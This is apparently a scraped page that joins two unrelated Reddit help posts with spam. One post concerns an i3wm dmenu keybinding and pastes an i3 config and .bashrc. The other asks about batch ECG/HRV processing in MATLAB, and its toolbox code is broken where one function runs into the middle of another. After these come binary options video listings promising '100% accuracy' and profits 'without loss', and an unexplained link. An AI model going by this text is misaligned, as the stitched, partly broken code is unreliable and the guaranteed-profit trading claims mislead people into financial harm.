This jsut opens the i33 config file with visual studio code. Again this works when I execute it via dmenu_run that was called from existing termina but it doesen't work when executed via dmenu_run that was called via i3 keybinding mod+d
EDIT 2:
.i3/config
# i3 config file (v4) # Please see http://i3wm.org/docs/userguide.html for a complete reference! # Set mod key (Mod1=, Mod4=) set $mod Mod4 # My testing shortcuts bindsym $mod+c exec code bindsym $mod+Shift+x exec terminal; exec terminal bindsym $mod+F4 exec /home/erik/Programs/pycharm-community-2020.2.1/bin/pycharm.sh bindsym $mod+Shift+F2 exec /home/erik/CustomScripts/google_calendar # CONFIGURABLE PRINTSCREENS OPTIONS # take a screenshot of a screen region and copy it to a clipboard #bindsym --release Shift+Print exec "ScreenCapture.sh -s /home/erik/Pictures/Screenshots/" # take a screenshot of a whole window and copy it to a clipboard #bindsym --release Print exec "ScreenCapture.sh /home/erik/Pictures/Screenshots/" # set default desktop layout (default is tiling) # workspace_layout tabbed  # Configure border style  default_border pixel 2 default_floating_border normal # Hide borders hide_edge_borders none # change borders bindsym $mod+u border none bindsym $mod+y border pixel 1 bindsym $mod+n border normal # You can also use any non-zero value if you'd like to have a border (this is to prevent issues with gaps) # for_window [class=".*"] border pixel 1 # Font for window titles. Will also be used by the bar unless a different font # is used in the bar {} block below. font xft:URWGothic-Book 11 # Use Mouse+$mod to drag floating windows floating_modifier $mod # start a terminal bindsym $mod+Return exec terminal # kill focused window bindsym $mod+Shift+q kill # start program launcher # bindsym $mod+d exec --no-startup-id dmenu_recency bindsym $mod+d exec --no-startup-id home/erik/CustomScripts/redit_solution dmenu_recency # launch categorized menu bindsym $mod+z exec --no-startup-id morc_menu ################################################################################################ ## sound-section - DO NOT EDIT if you wish to automatically upgrade Alsa -> Pulseaudio later! ## ################################################################################################ #exec --no-startup-id volumeicon #bindsym $mod+Ctrl+m exec terminal -e 'alsamixer' exec --no-startup-id start-pulseaudio-x11 exec --no-startup-id pa-applet bindsym $mod+Ctrl+m exec pavucontrol ################################################################################################ # Screen brightness controls # bindsym XF86MonBrightnessUp exec "xbacklight -inc 10; notify-send 'brightness up'" # bindsym XF86MonBrightnessDown exec "xbacklight -dec 10; notify-send 'brightness down'" # Start Applications bindsym $mod+Ctrl+b exec terminal -e 'bmenu' bindsym $mod+F2 exec chromium bindsym $mod+F3 exec pcmanfm # bindsym $mod+F3 exec ranger bindsym $mod+Shift+F3 exec pcmanfm_pkexec bindsym $mod+F5 exec terminal -e 'mocp' bindsym $mod+t exec --no-startup-id pkill compton bindsym $mod+Ctrl+t exec --no-startup-id compton -b bindsym $mod+Shift+d --release exec "killall dunst; exec notify-send 'restart dunst'" bindsym Print exec --no-startup-id i3-scrot bindsym $mod+Print --release exec --no-startup-id i3-scrot -w bindsym $mod+Shift+Print --release exec --no-startup-id i3-scrot -s bindsym $mod+Shift+h exec xdg-open /usshare/doc/manjaro/i3_help.pdf bindsym $mod+Ctrl+x --release exec --no-startup-id xkill focus_follows_mouse no # change focus bindsym $mod+j focus left bindsym $mod+k focus down bindsym $mod+l focus up bindsym $mod+semicolon focus right # alternatively, you can use the cursor keys: bindsym $mod+Left focus left bindsym $mod+Down focus down bindsym $mod+Up focus up bindsym $mod+Right focus right # move focused window bindsym $mod+Shift+j move left bindsym $mod+Shift+k move down bindsym $mod+Shift+l move up bindsym $mod+Shift+semicolon move right # alternatively, you can use the cursor keys: bindsym $mod+Shift+Left move left bindsym $mod+Shift+Down move down bindsym $mod+Shift+Up move up bindsym $mod+Shift+Right move right # workspace back and forth (with/without active container) workspace_auto_back_and_forth yes bindsym $mod+b workspace back_and_forth bindsym $mod+Shift+b move container to workspace back_and_forth; workspace back_and_forth # split orientation bindsym $mod+h split h;exec notify-send 'tile horizontally' bindsym $mod+v split v;exec notify-send 'tile vertically' bindsym $mod+q split toggle # toggle fullscreen mode for the focused container bindsym $mod+f fullscreen toggle # change container layout (stacked, tabbed, toggle split) bindsym $mod+s layout stacking bindsym $mod+w layout tabbed bindsym $mod+e layout toggle split # toggle tiling / floating bindsym $mod+Shift+space floating toggle # change focus between tiling / floating windows bindsym $mod+space focus mode_toggle # toggle sticky bindsym $mod+Shift+s sticky toggle # focus the parent container bindsym $mod+a focus parent # move the currently focused window to the scratchpad bindsym $mod+Shift+minus move scratchpad # Show the next scratchpad window or hide the focused scratchpad window. # If there are multiple scratchpad windows, this command cycles through them. bindsym $mod+minus scratchpad show #navigate workspaces next / previous bindsym $mod+Ctrl+Right workspace next bindsym $mod+Ctrl+Left workspace prev # Workspace names # to display names or symbols instead of plain workspace numbers you can use # something like: set $ws1 1:mail # set $ws2 2: set $ws1 1 set $ws2 2 set $ws3 3 set $ws4 4 set $ws5 5 set $ws6 6 set $ws7 7 set $ws8 8 # switch to workspace bindsym $mod+1 workspace $ws1 bindsym $mod+2 workspace $ws2 bindsym $mod+3 workspace $ws3 bindsym $mod+4 workspace $ws4 bindsym $mod+5 workspace $ws5 bindsym $mod+6 workspace $ws6 bindsym $mod+7 workspace $ws7 bindsym $mod+8 workspace $ws8 # Move focused container to workspace bindsym $mod+Ctrl+1 move container to workspace $ws1 bindsym $mod+Ctrl+2 move container to workspace $ws2 bindsym $mod+Ctrl+3 move container to workspace $ws3 bindsym $mod+Ctrl+4 move container to workspace $ws4 bindsym $mod+Ctrl+5 move container to workspace $ws5 bindsym $mod+Ctrl+6 move container to workspace $ws6 bindsym $mod+Ctrl+7 move container to workspace $ws7 bindsym $mod+Ctrl+8 move container to workspace $ws8 # Move to workspace with focused container bindsym $mod+Shift+1 move container to workspace $ws1; workspace $ws1 bindsym $mod+Shift+2 move container to workspace $ws2; workspace $ws2 bindsym $mod+Shift+3 move container to workspace $ws3; workspace $ws3 bindsym $mod+Shift+4 move container to workspace $ws4; workspace $ws4 bindsym $mod+Shift+5 move container to workspace $ws5; workspace $ws5 bindsym $mod+Shift+6 move container to workspace $ws6; workspace $ws6 bindsym $mod+Shift+7 move container to workspace $ws7; workspace $ws7 bindsym $mod+Shift+8 move container to workspace $ws8; workspace $ws8 # Open applications on specific workspaces # assign [class="Thunderbird"] $ws1 # assign [class="Pale moon"] $ws2 # assign [class="Pcmanfm"] $ws3 # assign [class="Skype"] $ws5 # Open specific applications in floating mode for_window [title="alsamixer"] floating enable border pixel 1 for_window [class="calamares"] floating enable border normal for_window [class="Clipgrab"] floating enable for_window [title="File Transfer*"] floating enable for_window [class="fpakman"] floating enable for_window [class="Galculator"] floating enable border pixel 1 for_window [class="GParted"] floating enable border normal for_window [title="i3_help"] floating enable sticky enable border normal for_window [class="Lightdm-settings"] floating enable for_window [class="Lxappearance"] floating enable sticky enable border normal for_window [class="Manjaro-hello"] floating enable for_window [class="Manjaro Settings Manager"] floating enable border normal for_window [title="MuseScore: Play Panel"] floating enable for_window [class="Nitrogen"] floating enable sticky enable border normal for_window [class="Oblogout"] fullscreen enable for_window [class="octopi"] floating enable for_window [title="About Pale Moon"] floating enable for_window [class="Pamac-manager"] floating enable for_window [class="Pavucontrol"] floating enable for_window [class="qt5ct"] floating enable sticky enable border normal for_window [class="Qtconfig-qt4"] floating enable sticky enable border normal for_window [class="Simple-scan"] floating enable border normal for_window [class="(?i)System-config-printer.py"] floating enable border normal for_window [class="Skype"] floating enable border normal for_window [class="Timeset-gui"] floating enable border normal for_window [class="(?i)virtualbox"] floating enable border normal for_window [class="Xfburn"] floating enable # switch to workspace with urgent window automatically for_window [urgent=latest] focus # reload the configuration file bindsym $mod+Shift+c reload # restart i3 inplace (preserves your layout/session, can be used to upgrade i3) bindsym $mod+Shift+r restart # exit i3 (logs you out of your X session) bindsym $mod+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'" # Set shut down, restart and locking features bindsym $mod+0 mode "$mode_system" set $mode_system (l)ock, (e)xit, switch_(u)ser, (s)uspend, (h)ibernate, (r)eboot, (Shift+s)hutdown mode "$mode_system" { bindsym l exec --no-startup-id i3exit lock, mode "default" bindsym s exec --no-startup-id i3exit suspend, mode "default" bindsym u exec --no-startup-id i3exit switch_user, mode "default" bindsym e exec --no-startup-id i3exit logout, mode "default" bindsym h exec --no-startup-id i3exit hibernate, mode "default" bindsym r exec --no-startup-id i3exit reboot, mode "default" bindsym Shift+s exec --no-startup-id i3exit shutdown, mode "default" # exit system mode: "Enter" or "Escape" bindsym Return mode "default" bindsym Escape mode "default" } # Resize window (you can also use the mouse for that) bindsym $mod+r mode "resize" mode "resize" { # These bindings trigger as soon as you enter the resize mode # Pressing left will shrink the window’s width. # Pressing right will grow the window’s width. # Pressing up will shrink the window’s height. # Pressing down will grow the window’s height. bindsym j resize shrink width 5 px or 5 ppt bindsym k resize grow height 5 px or 5 ppt bindsym l resize shrink height 5 px or 5 ppt bindsym semicolon resize grow width 5 px or 5 ppt # same bindings, but for the arrow keys bindsym Left resize shrink width 5 px or 5 ppt bindsym Down resize grow height 5 px or 5 ppt bindsym Up resize shrink height 5 px or 5 ppt bindsym Right resize grow width 5 px or 5 ppt # exit resize mode: Enter or Escape bindsym Return mode "default" bindsym Escape mode "default" } # Lock screen bindsym $mod+9 exec --no-startup-id blurlock # Autostart applications exec --no-startup-id /uslib/polkit-gnome/polkit-gnome-authentication-agent-1 exec --no-startup-id nitrogen --restore; sleep 1; compton -b # exec --no-startup-id manjaro-hello exec --no-startup-id nm-applet exec --no-startup-id xfce4-power-manager exec --no-startup-id pamac-tray exec --no-startup-id clipit exec --no-startup-id picom # exec --no-startup-id blueman-applet # exec_always --no-startup-id sbxkb exec --no-startup-id start_conky_maia # exec --no-startup-id start_conky_green exec --no-startup-id xautolock -time 10 -locker blurlock exec_always --no-startup-id ff-theme-util exec_always --no-startup-id fix_xcursor # Color palette used for the terminal ( ~/.Xresources file ) # Colors are gathered based on the documentation: # https://i3wm.org/docs/userguide.html#xresources # Change the variable name at the place you want to match the color # of your terminal like this: # [example] # If you want your bar to have the same background color as your # terminal background change the line 362 from: # background #14191D # to: # background $term_background # Same logic applied to everything else. set_from_resource $term_background background set_from_resource $term_foreground foreground set_from_resource $term_color0 color0 set_from_resource $term_color1 color1 set_from_resource $term_color2 color2 set_from_resource $term_color3 color3 set_from_resource $term_color4 color4 set_from_resource $term_color5 color5 set_from_resource $term_color6 color6 set_from_resource $term_color7 color7 set_from_resource $term_color8 color8 set_from_resource $term_color9 color9 set_from_resource $term_color10 color10 set_from_resource $term_color11 color11 set_from_resource $term_color12 color12 set_from_resource $term_color13 color13 set_from_resource $term_color14 color14 set_from_resource $term_color15 color15 # Start i3bar to display a workspace bar (plus the system information i3status if available) bar { i3bar_command i3bar status_command i3status position bottom ## please set your primary output first. Example: 'xrandr --output eDP1 --primary' # tray_output primary # tray_output eDP1 bindsym button4 nop bindsym button5 nop # font xft:URWGothic-Book 11 strip_workspace_numbers yes colors { background #222D31 statusline #F9FAF9 separator #ff9a1f # border backgr. text focused_workspace #ff9a1f #ff9a1f #292F34 active_workspace #595B5B #353836 #FDF6E3 inactive_workspace #595B5B #222D31 #EEE8D5 binding_mode #16a085 #2C2C2C #F9FAF9 urgent_workspace #16a085 #FDF6E3 #E5201D } } # hide/unhide i3status bar bindsym $mod+m bar mode toggle # Theme colors # class border backgr. text indic. child_border client.focused #ff9a1f #ff9a1f #000000 #ff9a1f client.focused_inactive #2F3D44 #2F3D44 #1ABC9C #454948 client.unfocused #2F3D44 #2F3D44 #1ABC9C #454948 client.urgent #CB4B16 #FDF6E3 #1ABC9C #268BD2 client.placeholder #000000 #0c0c0c #ffffff #000000 client.background #2B2C2B ############################# ### settings for i3-gaps: ### ############################# # Set inneouter gaps gaps inner 0 gaps outer 0 # Additionally, you can issue commands with the following syntax. This is useful to bind keys to changing the gap size. # gaps inner|outer current|all set|plus|minus  # gaps inner all set 10 # gaps outer all plus 5 # Smart gaps (gaps used if only more than one container on the workspace) smart_gaps on # Smart borders (draw borders around container only if it is not the only container on this workspace) # on|no_gaps (on=always activate and no_gaps=only activate if the gap size to the edge of the screen is 0) smart_borders on # Press $mod+Shift+g to enter the gap mode. Choose o or i for modifying outeinner gaps. Press one of + / - (in-/decrement for current workspace) or 0 (remove gaps for current workspace). If you also press Shift with these keys, the change will be global for all workspaces. set $mode_gaps Gaps: (o) outer, (i) inner set $mode_gaps_outer Outer Gaps: +|-|0 (local), Shift + +|-|0 (global) set $mode_gaps_inner Inner Gaps: +|-|0 (local), Shift + +|-|0 (global) bindsym $mod+Shift+g mode "$mode_gaps" mode "$mode_gaps" { bindsym o mode "$mode_gaps_outer" bindsym i mode "$mode_gaps_inner" bindsym Return mode "default" bindsym Escape mode "default" } mode "$mode_gaps_inner" { bindsym plus gaps inner current plus 5 bindsym minus gaps inner current minus 5 bindsym 0 gaps inner current set 0 bindsym Shift+plus gaps inner all plus 5 bindsym Shift+minus gaps inner all minus 5 bindsym Shift+0 gaps inner all set 0 bindsym Return mode "default" bindsym Escape mode "default" } mode "$mode_gaps_outer" { bindsym plus gaps outer current plus 5 bindsym minus gaps outer current minus 5 bindsym 0 gaps outer current set 0 bindsym Shift+plus gaps outer all plus 5 bindsym Shift+minus gaps outer all minus 5 bindsym Shift+0 gaps outer all set 0 bindsym Return mode "default" bindsym Escape mode "default" } 
.bashrc
# # ~/.bashrc # [[ $- != *i* ]] && return colors() { local fgc bgc vals seq0 printf "Color escapes are %s\n" '\e[${value};...;${value}m' printf "Values 30..37 are \e[33mforeground colors\e[m\n" printf "Values 40..47 are \e[43mbackground colors\e[m\n" printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n" # foreground colors for fgc in {30..37}; do # background colors for bgc in {40..47}; do fgc=${fgc#37} # white bgc=${bgc#40} # black vals="${fgc:+$fgc;}${bgc}" vals=${vals%%;} seq0="${vals:+\e[${vals}m}" printf " %-9s" "${seq0:-(default)}" printf " ${seq0}TEXT\e[m" printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m" done echo; echo done } [ -r /usshare/bash-completion/bash_completion ] && . /usshare/bash-completion/bash_completion # Change the window title of X terminals case ${TERM} in xterm*|rxvt*|Eterm*|aterm|kterm|gnome*|interix|konsole*) PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME%%.*}:${PWD/#$HOME/\~}\007"' ;; screen*) PROMPT_COMMAND='echo -ne "\033_${USER}@${HOSTNAME%%.*}:${PWD/#$HOME/\~}\033\\"' ;; esac use_color=true # Set colorful PS1 only on colorful terminals. # dircolors --print-database uses its own built-in database # instead of using /etc/DIR_COLORS. Try to use the external file # first to take advantage of user additions. Use internal bash # globbing instead of external grep binary. safe_term=${TERM//[^[:alnum:]]/?} # sanitize TERM match_lhs="" [[ -f ~/.dir_colors ]] && match_lhs="${match_lhs}$(<~/.dir_colors)" [[ -f /etc/DIR_COLORS ]] && match_lhs="${match_lhs}$(/dev/null \ && match_lhs=$(dircolors --print-database) [[ $'\n'${match_lhs} == *$'\n'"TERM "${safe_term}* ]] && use_color=true if ${use_color} ; then # Enable colors for ls, etc. Prefer ~/.dir_colors #64489 if type -P dircolors >/dev/null ; then if [[ -f ~/.dir_colors ]] ; then eval $(dircolors -b ~/.dir_colors) elif [[ -f /etc/DIR_COLORS ]] ; then eval $(dircolors -b /etc/DIR_COLORS) fi fi if [[ ${EUID} == 0 ]] ; then PS1='\[\033[01;31m\][\h\[\033[01;36m\] \W\[\033[01;31m\]]\$\[\033[00m\] ' else PS1='\[\033[01;32m\][\u@\h\[\033[01;37m\] \W\[\033[01;32m\]]\$\[\033[00m\] ' fi alias ls='ls --color=auto' alias grep='grep --colour=auto' alias egrep='egrep --colour=auto' alias fgrep='fgrep --colour=auto' else if [[ ${EUID} == 0 ]] ; then # show root@ when we don't have colors PS1='\u@\h \W \$ ' else PS1='\u@\h \w \$ ' fi fi unset use_color safe_term match_lhs sh alias cp="cp -i" # confirm before overwriting something alias df='df -h' # human-readable sizes alias free='free -m' # show sizes in MB alias np='nano -w PKGBUILD' alias more=less xhost +local:root > /dev/null 2>&1 complete -cf sudo # Bash won't get SIGWINCH if another process is in the foreground. # Enable checkwinsize so that bash will check the terminal size when # it regains control. #65623 # http://cnswww.cns.cwru.edu/~chet/bash/FAQ (E11) shopt -s checkwinsize shopt -s expand_aliases # export QT_SELECT=4 # Enable history appending instead of overwriting. #139609 shopt -s histappend # # # ex - archive extractor # # usage: ex  ex () { if [ -f $1 ] ; then case $1 in *.tar.bz2) tar xjf $1 ;; *.tar.gz) tar xzf $1 ;; *.bz2) bunzip2 $1 ;; *.rar) unrar x $1 ;; *.gz) gunzip $1 ;; *.tar) tar xf $1 ;; *.tbz2) tar xjf $1 ;; *.tgz) tar xzf $1 ;; *.zip) unzip $1 ;; *.Z) uncompress $1;; *.7z) 7z x $1 ;; *) echo "'$1' cannot be extracted via ex()" ;; esac else echo "'$1' is not a valid file" fi } #Custom programs export PATH="/home/uusePrograms/pycharm-community-2020.2.1/bin:$PATH" # Custom scritps export PATH="/home/useCustomScripts:$PATH" 

submitted by Amuoeba8 to i3wm [link] [comments]

ResultsFileName = 0×0 empty char array Why? Where are my results?

Hello,
I am not getting any errors and I do not understand why I am not getting any output. I am trying to batch process a large number of ecg signals. Below is my code and the two relevant functions. Any help greatly appreciated. I am very new.
d = importSections("Dx_sections.csv"); % set the number of recordings n = height(d); % settings HRVparams = InitializeHRVparams('test_physionet') for ii = 1:n % Import waveform (ECG) [record, signals] = read_edf(strcat(d.PID(ii), '/baseline.edf')); myecg = record.ECG; Ann = []; [HRVout, ResultsFileName] = Main_HRV_Analysis(myecg,'','ECGWaveform',HRVparams) end function [HRVout, ResultsFileName ] = Main_HRV_Analysis(InputSig,t,InputFormat,HRVparams,subID,ann,sqi,varargin) % ====== HRV Toolbox for PhysioNet Cardiovascular Signal Toolbox ========= % % Main_HRV_Analysis(InputSig,t,InputFormat,HRVparams,subID,ann,sqi,varargin) % OVERVIEW: % Main "Validated Open-Source Integrated Matlab" VOSIM Toolbox script % Configured to accept RR intervals as well as raw data as input file % % INPUT: % InputSig - Vector containing RR intervals data (in seconds) % or ECG/PPG waveform % t - Time indices of the rr interval data (seconds) or % leave empty for ECG/PPG input % InputFormat - String that specifiy if the input vector is: % 'RRIntervals' for RR interval data % 'ECGWaveform' for ECG waveform % 'PPGWaveform' for PPG signal % HRVparams - struct of settings for hrv_toolbox analysis that can % be obtained using InitializeHRVparams.m function % HRVparams = InitializeHRVparams(); % % % OPTIONAL INPUTS: % subID - (optional) string to identify current subject % ann - (optional) annotations of the RR data at each point % indicating the type of the beat % sqi - (optional) Signal Quality Index; Requires a % matrix with at least two columns. Column 1 % should be timestamps of each sqi measure, and % Column 2 should be SQI on a scale from 0 to 1. % Use InputSig, Type pairs for additional signals such as ABP % or PPG signal. The input signal must be a vector containing % signal waveform and the Type: 'ABP' and\or 'PPG'. % % % OUTPUS: % results - HRV time and frequency domain metrics as well % as AC and DC, SDANN and SDNNi % ResultsFileName - Name of the file containing the results % % NOTE: before running this script review and modifiy the parameters % in "initialize_HRVparams.m" file accordingly with the specific % of the new project (see the readme.txt file for further details) % % EXAMPLES % - rr interval input % Main_HRV_Analysis(RR,t,'RRIntervals',HRVparams) % - ECG wavefrom input % Main_HRV_Analysis(ECGsig,t,'ECGWavefrom',HRVparams,'101') % - ECG waveform and also ABP and PPG waveforms % Main_HRV_Analysis(ECGsig,t,'ECGWaveform',HRVparams,[],[],[], abpSig, % 'ABP', ppgSig, 'PPG') % % DEPENDENCIES & LIBRARIES: % HRV Toolbox for PhysioNet Cardiovascular Signal Toolbox % https://github.com/cliffordlab/PhysioNet-Cardiovascular-Signal-Toolbox % % REFERENCE: % Vest et al. "An Open Source Benchmarked HRV Toolbox for Cardiovascular % Waveform and Interval Analysis" Physiological Measurement (In Press), 2018. % % REPO: % https://github.com/cliffordlab/PhysioNet-Cardiovascular-Signal-Toolbox % ORIGINAL SOURCE AND AUTHORS: % This script written by Giulia Da Poian % Dependent scripts written by various authors % (see functions for details) % COPYRIGHT (C) 2018 % LICENSE: % This software is offered freely and without warranty under % the GNU (v3 or later) public license. See license file for % more information %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% if nargin < 4 error('Wrong number of input arguments') end if nargin < 5 subID = '0000'; end if nargin < 6 ann = []; end if nargin < 7 sqi = []; end if length(varargin) == 1 || length(varargin) == 3 error('Incomplete Signal-Type pair') elseif length(varargin) == 2 extraSigType = varargin(2); extraSig = varargin{1}; elseif length(varargin) == 4 extraSigType = [varargin(2) varargin(4)]; extraSig = [varargin{1} varargin{3}]; end if isa(subID,'cell'); subID = string(subID); end % Control on signal length if (strcmp(InputFormat, 'ECGWaveform') && length(InputSig)/HRVparams.Fs< HRVparams.windowlength) ... || (strcmp(InputFormat, 'PPGWaveform') && length(InputSig)/HRVparams.Fs 300 s VLF = [0.0033 .04]; % Requires at least 300 s window LF = [.04 .15]; % Requires at least 25 s window HF = [0.15 0.4]; % Requires at least 7 s window HRVparams.freq.limits = [ULF; VLF; LF; HF]; HRVparams.freq.zero_mean = 1; % Default: 1, Option for subtracting the mean from the input data HRVparams.freq.method = 'lomb'; % Default: 'lomb' % Options: 'lomb', 'burg', 'fft', 'welch' HRVparams.freq.plot_on = 0; % The following settings are for debugging spectral analysis methods HRVparams.freq.debug_sine = 0; % Default: 0, Adds sine wave to tachogram for debugging HRVparams.freq.debug_freq = 0.15; % Default: 0.15 HRVparams.freq.debug_weight = .03; % Default: 0.03 % Lomb: HRVparams.freq.normalize_lomb = 0; % Default: 0 % 1 = Normalizes Lomb Periodogram, % 0 = Doesn't normalize % Burg: (not recommended) HRVparams.freq.burg_poles = 15; % Default: 15, Number of coefficients % for spectral estimation using the Burg % method (not recommended) % The following settings are only used when the user specifies spectral % estimation methods that use resampling : 'welch','fft', 'burg' HRVparams.freq.resampling_freq = 7; % Default: 7, Hz HRVparams.freq.resample_interp_method = 'cub'; % Default: 'cub' % 'cub' = cublic spline method % 'lin' = linear spline method HRVparams.freq.resampled_burg_poles = 100; % Default: 100 %% 11. SDANN and SDNNI Analysis Settings HRVparams.sd.on = 1; % Default: 1, SD analysis 1=On or 0=Off HRVparams.sd.segmentlength = 300; % Default: 300, windows length in seconds %% 12. PRSA Analysis Settings HRVparams.prsa.on = 1; % Default: 1, PRSA Analysis 1=On or 0=Off HRVparams.prsa.win_length = 30; % Default: 30, The length of the PRSA signal % before and after the anchor points % (the resulting PRSA has length 2*L) HRVparams.prsa.thresh_per = 20; % Default: 20%, Percent difference that one beat can % differ from the next in the prsa code HRVparams.prsa.plot_results = 0; % Default: 0 HRVparams.prsa.scale = 2; % Default: 2, scale parameter for wavelet analysis (to compute AC and DC) %% 13. Peak Detection Settings % The following settings are for jqrs.m HRVparams.PeakDetect.REF_PERIOD = 0.250; % Default: 0.25 (should be 0.15 for FECG), refractory period in sec between two R-peaks HRVparams.PeakDetect.THRES = .6; % Default: 0.6, Energy threshold of the detector HRVparams.PeakDetect.fid_vec = []; % Default: [], If some subsegments should not be used for finding the optimal % threshold of the P&T then input the indices of the corresponding points here HRVparams.PeakDetect.SIGN_FORCE = []; % Default: [], Force sign of peaks (positive value/negative value) HRVparams.PeakDetect.debug = 0; % Default: 0 HRVparams.PeakDetect.ecgType = 'MECG'; % Default : MECG, options (adult MECG) or featl ECG (fECG) HRVparams.PeakDetect.windows = 15; % Befautl: 15,(in seconds) size of the window onto which to perform QRS detection %% 14. Entropy Settings % Multiscale Entropy HRVparams.MSE.on = 1; % Default: 1, MSE Analysis 1=On or 0=Off HRVparams.MSE.windowlength = []; % Default: [], windows size in seconds, default perform MSE on the entire signal HRVparams.MSE.increment = []; % Default: [], window increment HRVparams.MSE.RadiusOfSimilarity = 0.15; % Default: 0.15, Radius of similarity (% of std) HRVparams.MSE.patternLength = 2; % Default: 2, pattern length HRVparams.MSE.maxCoarseGrainings = 20; % Default: 20, Maximum number of coarse-grainings % SampEn an ApEn HRVparams.Entropy.on = 1; % Default: 1, MSE Analysis 1=On or 0=Off HRVparams.Entropy.RadiusOfSimilarity = 0.15; % Default: 0.15, Radius of similarity (% of std) HRVparams.Entropy.patternLength = 2; % Default: 2, pattern length %% 15. DFA Settings HRVparams.DFA.on = 1; % Default: 1, DFA Analysis 1=On or 0=Off HRVparams.DFA.windowlength = []; % Default [], windows size in seconds, default perform DFA on the entair signal HRVparams.DFA.increment = []; % Default: [], window increment HRVparams.DFA.minBoxSize = 4 ; % Default: 4, Smallest box width HRVparams.DFA.maxBoxSize = []; % Largest box width (default in DFA code: signal length/4) HRVparams.DFA.midBoxSize = 16; % Medium time scale box width (default in DFA code: 16) %% 16. Poincaré plot HRVparams.poincare.on = 1; % Default: 1, Poincare Analysis 1=On or 0=Off %% 17. Heart Rate Turbulence (HRT) - Settings HRVparams.HRT.on = 1; % Default: 1, HRT Analysis 1=On or 0=Off HRVparams.HRT.BeatsBefore = 2; % Default: 2, # of beats before PVC HRVparams.HRT.BeatsAfter = 16; % Default: 16, # of beats after PVC and CP HRVparams.HRT.GraphOn = 0; % Default: 0, do not plot HRVparams.HRT.windowlength = 24; % Default 24h, windows size in hours HRVparams.HRT.increment = 24; % Default 24h, sliding window increment in hours HRVparams.HRT.filterMethod = 'mean5before'; % Default mean5before, HRT filtering option %% 18. Output Settings HRVparams.gen_figs = 0; % Generate figures HRVparams.save_figs = 0; % Save generated figures if HRVparams.save_figs == 1 HRVparams.gen_figs = 1; end % Format settings for HRV Outputs HRVparams.output.format = 'csv'; % 'csv' - creates csv file for output % 'mat' - creates .mat file for output HRVparams.output.separate = 0; % Default : 1 = separate files for each subject % 0 = all results in one file HRVparams.output.num_win = []; % Specify number of lowest hr windows returned % leave blank if all windows should be returned % Format settings for annotations generated HRVparams.output.ann_format = 'binary'; % 'binary' = binary annotation file generated % 'csv' = ASCII CSV file generated %% 19. Filename to Save Data HRVparams.time = datestr(now, 'yyyymmdd'); % Setup time for filename of output HRVparams.filename = [HRVparams.time '_' project_name]; %% Export Parameter as Latex Table % Note that if you change the order of the parameters or add parameters % this might not work ExportHRVparams(HRVparams); end 
submitted by MisuzBrisby to matlab [link] [comments]

Binary Options Trade With 100% Accuracy How to Hack! - YouTube 223% ROI Digit Match Using Binary Bot - Oscar Grind Script FREE DOWNLOAD SCRIPT BINARY BOT NEW BOT SCRIPT, 95% Profitable - Binary Options Robot Free ... Best Binary Bot 2020 for Binary.com Best Robot Software ...

Binary Options Strategy Testing Script. aquajets1. This is a script for testing binary options trading strategies. To test a strategy, modify the 'go_down' or 'go_up' booleans. These SHOULD NOT access any current values (for example, 'ohlc4' or 'close '), or the backtesting will not be an accurate representation of the forward values. Modify ... This indicator with default settings is designed for BINARY OPTIONS trading. The indicator can also be used for Forex trading with some setting changes. The script shows Two Bar Pullback Break lines and alerts when those Break lines are Touched (broken) creating a short term momentum entry condition. Get 10 binary option plugins, code & scripts on CodeCanyon. Buy binary option plugins, code & scripts from $4. All from our global community of web developers. Dealing with binary files, however, is more complicated. These files are often packaged up into archives, tarballs, or other packaging formats. The run-on-binaries script provides a convenient way to run a command on a collection of files, regardless of how they are packaged. The invocation of the script is quite simple: run-on-binaries < file ... Get a clean responsive Binary Option Script. Specially developed for Binary/Forex Trading, Crypto Trading, Broker management and Investment. This Script developed with super powerful PHP Version which allow you to customize with your own broker company.

[index] [3595] [3233] [3985] [5409] [4517] [585] [5614] [5072] [1221] [2230]

Binary Options Trade With 100% Accuracy How to Hack! - YouTube

Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42. BLW Online Trading 61,575 views. 43:42 "FRACTAL 9" Prove it with REAL MONEY ! Make 10 usd Every 50 Seconds Trading Binary Options 100% WINS - Profitable 2018 Trading strategies - Duration: 5:58. Proudly Tech Money General Tips And Tricks 57,043 views 5:58 🚩Certified Broker!🔔 Sign up to Get 💰Profit Offers💰👉 https://bit.ly/2Q2FvmG 🚩Automated Binary Options Trading Software 👉 https://bit.ly/SoftSignal ... How to Get FREE ROBOT & SIGNAL, Please Follow these steps ! 1. Visit My Twitter Account https://goo.gl/7tRX2n 2. On My Twitter Account, Find Top Post (pinned... https://ExpertBinaryTrader2020.Blogspot.com Make High Profits without Risk. Best Binary Options Trading Strategy without Loss. Never Lose Money In Binary Opt...

https://vefuciprextkot.cf